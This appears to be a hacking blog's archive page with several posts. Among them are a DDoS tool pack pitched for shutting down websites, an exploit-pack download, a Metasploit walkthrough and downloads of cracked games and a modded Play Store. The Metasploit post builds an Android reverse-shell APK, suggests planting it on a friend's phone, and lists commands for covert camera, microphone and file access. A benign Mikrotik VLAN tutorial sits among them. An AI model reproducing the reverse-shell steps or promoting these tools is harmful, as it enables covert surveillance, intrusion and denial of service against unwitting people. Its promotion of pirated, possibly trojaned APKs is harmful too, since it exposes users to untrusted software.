Selasa, 23 Februari 2016

Distrubuted Denial of Service Attack Mini Pack

DDoS Attack Pack

Beware of Distributed Denial of Service Attacks

DISTRIBUTED DENIAL OF SERVICE

This Acronym DDoS spells out  "Distributed Denial of Service." A DDoS assault is a pernicious endeavor to make an online administration inaccessible to clients, as a rule by incidentally hindering or suspending the administrations of its facilitating server.

(DoS) VS (DDos)

Unlike the Denial of Service (DoS) attack, where a single web-connected device (one network connection) is used to flood targeted resource with packets, a DDoS attack is executed from many unique connected devices, often distributed globally referred to as a botnet.

Two Types Of DDoS Attacks

UDP

This DDoS assault influences the User Datagram Protocol (UDP), a sessionless systems administration convention. This sort of assault surges irregular ports on a remote host with various UDP packets, bringing about the host to over and over check for the application listening at that port, and (when no application is discovered) answer with an ICMP Destination Unreachable bundle. This procedure saps host assets, and can at last prompt distance.

SYN

A SYN surge DDoS assault abuses a known shortcoming in the TCP association grouping (the "three-way handshake"), wherein a SYN solicitation to start a TCP association with a host must be replied by a SYN-ACK reaction from that host, and after that confirmed by an ACK reaction from the requester. In a SYN surge situation, the requester sends numerous SYN asks for, however either does not react to the host's SYN-ACK reaction, or sends the SYN asks for from a ridiculed IP address. In any case, the host framework keeps on sitting tight for affirmation for each of the solicitations, tying assets until no new associations can be made, and at last bringing about disavowal of administration.

The Three Divisions of DDoS are

Volume Based Attacks
Protocol Attacks
Application Layer Attacks

I have grouped up some DDoS tool found various places over the internet so you can test and if possible fix any bugs.

DDos Tools 
Link One
Link Two
Link Three
Link Four 
Link Five
Mini Ultimate Pack Depositfiles (Compressed by Ha{k3r4l!f3 )

Share and Comment for My Full Pack 
To 
Shutdown any website Https / Http
Ultimate Hack Pack 3.85 Gb Coded by Ha{k3r4l!f3

"Corupt Fear Us~ Guilty Confess to Us~ Heroes Join Us"

USE A VPN WITH THESE TOOLS






Read more

Sabtu, 20 Februari 2016

Teenage Hacker Arrested For Hacking FBI Material


 Teenage Hacker Arrested For Hacking FBI Material

A 15-year-old teen got captured from Scotland, by British Police for breaking into the FBI Systems on 16th February 2016.

Under the Britain’s Hacking Law, Computer Misuse Act 1990, the teen has been arrested for his role in hacking an unauthorized digital material belonging to the Federal Agents.


Federal Agents have already fled to Glasgow in an attempt to carry out a complete raid on the individuals home before proceeding with the boy's arrest.

As with the present scenario, reports reveal that the boy could be extradited to the United States to face the Intrusion and hacking charges.

Second Member of the Hacking Group Arrested

The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.

Another member of the same group got arrested from the United Kingdom last week. The 16-year-old British teenager was suspected of hacking into the CIA and the FBI confidential files and documents breaching security of the FBI.

The hacktivist group "Crackas with Attitude" is behind a multiples of hacks on the United States government and its high-level officials causing much damage with each attack.

As seen above by @IncursioSubter
Nowadays, the amateurish approach of teenage hackers are hunting down the world's greatest Crime solvers such as FBI and CIA.

Newbie Hackers and Script Kiddies dont go fooling arround and get caught 


Read more

Kamis, 18 Februari 2016

ULTIMATE EXPLOIT PACK


The ULTIMATE EXPLOIT PACK v5.03



Credits to JUAN SACCO for completing the compression and compilation of this tool !!
ULTIMATE EXPLOIT PACK 5

ULTIMATE Exploit Pack utilizes a propelled programming characterized interface that upholds quick reconfiguration to adjust exploitation codes to the always advancing risk environment. Our innovations permit you to quickly tests and safeguard your border against threatening remote targets.



We enhance ULTIMATE Exploit Pack code  on a consistent basis and our Tech  group is really great about keeping the code stable, yet it is not slug verification (bullet proof). Along these lines, utilizing the most recent stable code is a protected and simple approach to access the new components as we're included.


If you like it you can consider ......
DOWNLOADING ULTIMATE EXPLOIT PACK 5 Premium 
DOWNLOADING ULTIMATE EXPLOIT PACK 5 Professional 


Install Notes


Installation notes:

For Windows:
Download and install Java 8 from Oracle:
Windows Java SE Java 8 for 32 bits or Java 8 for 64 bits 
After you have installed Java 8 in your machine, double click ExplotPack.jar or from a console run this command: "java -jar ExploitPack.jar"

For Linux:
Under any Linux distribution that supports DEB packages like Ubuntu, Debian, Kali, etc. you can run the following commands to install Java 8 from an official repository 
Copy and paste the following in a terminal window:

echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" >> /etc/apt/sources.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" >> /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer

For OSX:
Download and install Java 8 for OSX 32/64 bits from Oracle: OSX Java 8 32/64 bits
After you have Java 8 installed in your Mac, double click ExploitPack.jar to run it or from a console: "java -jar ExploitPack.jar"

Known issues:
Using Exploit Pack could produce addiction
Prolonged periods of time using this tool could produce network mayhem or even dead

In case of intoxication ( using Exploit Pack under Windows ) please call your doctor immediately.


Comment below on any issues or questions you want to ask 
Read more

Rabu, 17 Februari 2016

Mengenal Mikrotik Cloud Router Switch (CRS)

Cloud Router Switch (CRS) adalah perangkat Smart Switch Series berperforma tinggi besutan Mikrotik yang memiliki banyak port ethernet (hingga 24 port). Perangkat CRS ini merupakan Multilayer Switch, yaitu selain bekerja pada layer 2, juga bisa bekerja di layer 3 switch dan uniknya OS yang digunakan juga RouterOS sehingga semua fitur pada RouterOS juga bisa diterapkan di perangkat ini. 

Contoh Mikrotik Cloud Router Switch (CRS)


Fitur Utama Cloud Router Switch

1. Forwarding
Port pada CRS dapat dikonfigurasi untuk switching maupun routing yang mendukung Full non-blocking wirespeed switching. Semua forwaerding database mendukung IVL dan SVL. Port based MAC learning limit yang dapat dikonfigurasi maksimal 1024 MAC per port. Selain itu, CRS juga mendukung frame dengan ukuran jumbo (CRS1xx: 4064 Bytes; CRS2xx: 9204 Bytes).

2. Mirroring
CRS mendukung bermacam tipe port mirroring, seperti : Port Based Mirroring, VLAN Based Mirroring, dan MAC Bassed Mirroring. Selain itu CRS juga memiliki 2 independent mirroring analyzer port.

3. Virtual LAN (VLAN)
Mikrotik CRS kompetibel dengan strandar IEEE802.1Q dan IEEE802.1ad VLAN. CRS mampu membuat active VLAN hingga 4000 VLAN. Mendukung Port Based VLAN, Protocol Based VLAN, MAC Based VLAN dan VLAN filtering.

4. Port Isolation & Leakage
CRS dapat diaplikasikan untuk mengimplementasikan private VLAN dengan 3 tipe port profile : Promiscuous, Isolated dan Community. Mendukung hingga 28 Comunity Profile.

5. Trunking 
CRS mendukung trunking dengan static link aggregation groups. Dapat membuat hingga 8 port Trunk group dan 8 port per trunk group. Mendukung Hardware automatic failover dan load balancing.

6. Quality of Service (QoS)
Mikrotik CRS juga mendukung manajemen bandwidth dengan penerapan QoS berdasarkan port, MAC, VLAN, Protocol, PCP/DEI, DSCP, ACL.

7. Shaping & Schedulling\
Mendukung 8 queue pada tiap port fisik, Shaping per port, per queue, dan per queue group.

8. Access Control List (ACL)
CRS mendukung Ingress dan Egress ACL table, dan hingga 512 ACL rule. Klasifikasi berdasarkan port, L2, L3, L4 protocol header. ACL actions meliputi filtering, forwarding dan dapat melakukan modifikasi pada protocol header fields.

Model Cloud Router Switch (CRS)

Berikut ini beberapa perbedaan pada model Mikrotik Cloud Router Switch (CRS) : 
Model CPU Wireless SFP+ port Access Control List Jumbo Frame (Bytes)
CRS112-8G-4S 400MHz - - + 9204
CRS210-8G-2S+ 400MHz - + + 9204
CRS212-1G-10S-1S+ 400MHz - + + 9204
CRS226-24G-2S+ 400MHz - + + 9204
CRS125-24G-1S 600MHz - - - 4064
CRS125-24G-1S-2HnD 600MHz + - - 4064
CRS109-8G-1S-2HnD 600MHz + - - 4064



Tagged Untagged
Di CRS, fitur tagged dan untagged bisa dibuat berdasarkan port, protocol ataupun berdasarkan mac address, agar memudahkan dalam melakukan custom di jaringan kita.
Untuk contoh topologi yang akan kita bentuk seperti berikut :
Topologi Contoh

RB450G, di interface ether5 terdapat 2 vlan, yaitu vlan-id=1 dan vlan-id=2
Kabel ethernet dari ether5 450G terhubung ke ether10 switch CRS
PC client yang akan kita masukkan kedalam vlan, terhubung ke ether12 dan ether14 dari CRS

Konfigurasi di sisi RB450G


Disini kita mendifiniskan vlan-id=1 dan vlan-id=2 di interface ether5. Dan tentunya kita juga pasangkan IP di masing-masing interface vlan tersebut.

Konfigurasi di CRS
Agar dapat memfungsikan fitur-fitur switch pada CRS kita, langkah pertama yang harus dilakukan adalah mengeset parameter "master-port" di interface ethernet yang ingin kita aktifkan sebagai switch. Fungsi dari master-port ini sebagai interface penghubung antara ethernet-ethernet yang menggunakan mode switch (SLAVE-PORT) dengan interface ethernet lain yang non switch mode. 


Dari gambar terlihat, ether12 dan ether14 kita atur sebagai slave dengan master-portnya di ether10. Artinya, ether10, ether12 dan ether14 sudah menjadi sebuah switch dan komunikasi antara port tersebut bisa full wire speed tanpa membebani CPU router lagi.
Apabila kita ingin memfungsikan routing, firewall, bandwidth management, qos dan sebagainya, kita cukup memasang rule-rulenya di ether10. Kenapa? karena ether10 berfungsi sebagai master-portnya, otomatis, setiap rule di ether10, akan berlaku di semua slave portnya (ether12 dan ether14)

VLAN berdasarkan Port
Dicontoh ini kita akan memfungsikan switch kita sebagai switch managed l2 berdasarkan PORT INTERFACE.
Karena ether10 terhubung ke interface RB450G yang memiliki vlan-id, berarti kita ingin semua trafik yang keluar dari ether10 harus sudah memiliki vlan-id (tagged / trunk port), begitu juga sebaliknya, karena perangkat yang terhubung di ether12 dan ether14 merupakan perangkat PC biasa, berarti kita harus mengatur semua trafik yang keluar dari kedua port tersebut harus dihilangkan dahulu vlan-idnya (untagged / access port).

Ingress VLAN Translation
Di menu ini, kita bisa memodifikasi frame yang masuk/incomming/ingress dari port switch kita.

Dari gambar terlihat, semua trafik yang berasal dari ether12 dan ether14 diset new-customer-vid sesuai dengan VLAN-ID pada RB450G, artinya frame yang semula memiliki customer-vid=0 (tanpa vlan-id), begitu masuk dari ether12 dan akan ke ethernet manapun akan diset memiliki new-customer-vid=1 (vlan-id=1 / tagged)

Egress VLAN Translation
Di menu ini, kita bisa memodifikasi frame yang akan keluar / outgoing / egress dari port switch kita.

Dari gambar terlihat, semua trafik yang akan keluar dari ether12 dan ether14 diset new-customer-vid menjadi 0 (tanpa vlan-id), sehingga trafik yang keluar dari ether12 dan ether14 bisa diterima PC biasa. Hal ini sama dengan membuat ether12 dan ether14 menjadi access port / untagged.

Hasil Akhir Dengan memfungsikan konfigurasi diatas, PC client yang berada di vlan1 dan vlan2 komunikasinya tidak lagi via layer 2 meskipun berada dalam 1 switch fisik, tetapi harus komunikasi inter-vlan yaitu melalui RB450G. 

Sumber :
http://mikrotik.co.id/artikel_lihat.php?id=73
Read more

Selasa, 16 Februari 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit




You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:


Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.


Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.16 (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit


When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.



Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4



Take photos using the devices cameras


First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap


If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2


Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2


Any Issue or thing you dont understand feel free to comment below ... Thanks 




Read more

Senin, 15 Februari 2016

Google Play Store BlackUI MOD|Cracked APK Latest





Google Play Store APK Original & Cracked Black UI Mod Included{NEWEST}

Today we are going to share Google Play Store Original  APK & Cracked Latest Release. Google Play Store Black UI Mod APK, Google Playstore APK Cracked new latest. Google Play Store BlackUI MOD|Cracked APK Latest.

GOOGLE PLAY STORE

Google Play is one of the best location to look for all your most loved apps , games and themes. With more than 470,000 applications, a great many editors and books, and a large number of themed launchers, Google Play has something for each and everybody.Google Play Store BlackUI MOD|Cracked APK Latest

Google Play Store BlackUI MOD|Cracked APK Latest

Google Play Store BlackUI MOD|Cracked APK Latest
Google Play Store BlackUI MOD|Cracked APK Latest
Google Play Store BlackUI MOD|Cracked APK Latest
What’s new about Google Play Store BlackUI MOD|Cracked APK Latest version 
                                                  : Modded by ChelpuS :

  • Families Sharing And Gifting of others
  •  Add NFC-Enabled Credit Cards easily with added option
  • You can now copy change logs and descriptions.
  • Use Google LVL protected apps.
  • Verify Offline
  • Patching not needed any more
  • Can not download paid apps for free directly
  • Disable auto update
  • Billing and License Verification to Proxy no longer work
  • Refund button reworked
  • All Bugs Fixed :)


DOWNLOAD Google Play Store BlackUI MOD|Cracked APK Latest

Links Below.....






                                                      Google Play Store Patched Cracked APK -Patched | Mirror

                                                     Google Play Store BlackUI MODAPK Black Mod | Mirror

Any Difficulties feel free to comment below :) 
Read more

Grand Theft Auto 5 {G.T.A V }

Grand Theft Auto 5 {G.T.A V }

PC Version




Grand Theft Auto Five (PC Version)

In the midst of the turmoil, three different culprits plot their own odds of survival and achievement: Franklin, a road trickster searching for genuine open doors and genuine cash; Michael, an expert ex-con whose retirement is significantly less ruddy than he trusted it would be; and Trevor, a fierce crazy person driven by the possibility of a shoddy high and the following enormous score.

Grand Theft Auto V is currently accessible on PC 

Grand Theft Auto V for PC highlights a scope of major visual and specialized moves up to make Los Santos and Blaine County more immersive than any time in recent memory. Notwithstanding inconceivably expanded draw separations, Grand Theft Auto V for PC keeps running at 60FPS in 1080p, with the capacity to show visuals in 4K determination. Players will encounter a scope of increases and enhancements including: 

· New weapons, vehicles and exercises 

· Additional untamed life 

· Denser movement 

· New foliage framework 

· Enhanced harm and climate impacts, and a great deal more 



ROCKSTAR !!


Every one of these components are upgraded by dazzling determination, emotional enhancements to lighting, shadows, and surfaces, and a smooth edge 

How to Crack
  • Copy the Crack into the Root of GTA V Installation Path.
  • Use the launcher.exe given by 3DM to launch , NOT ANY OTHER .EXE FILE.
DOWNLOAD

CRACK


This cracked version is guaranteed to work and tested on Windows 7 / 8 / 8.x


Read more

Sabtu, 13 Februari 2016

Candy Crush Soda Saga Modded APK has landed {LATEST}




Candy Crush Soda Saga Modded APK has landed {LATEST}







Candy Crush Soda Saga (CCSS)

Candy Crush Soda Saga is the name of the new arrangement of the famous amusement organization, King.com, the maker of the game and acquainted the world to construct another adaptation of the amusement Candy Crush Soda Saga named ie the variant of sodium. The PRO variant of the new characters and graphical design are very high.


Highlights
  1. Staggering HD representation and are extremely delicious! 
  2. Booster added to assist in the more elevated levels
  3. Characters and new interface in this Soda version
  4. Challenging and extremely difficult procedure 
  5. 165 exceptionally energizing stage in this game 
  6. This version highlights a multiplayer and Sharing Experience
  7. It gets addictive :)

Ulternative Links 
Version
 One
Version 
Two 
Version
 


There might be problems when login into Facebook in this Moded Candy Crush Soda Saga

Here is what you do :
    1. Download Candy Crush Soda Saga APK to your sd card. 
    2. Uninstall or simply solidify Facebook. 
    3. Uninstall old version of this game. 
    4. Install the downloaded file, and connect through Facebook. 
    If by any chance you have problems login into Facebook, go to app info ,force stop the game solidify/uninstall Facebook then that should solve the issue.

    Issues or problems feel free to comment below :) Thanks

                    Read more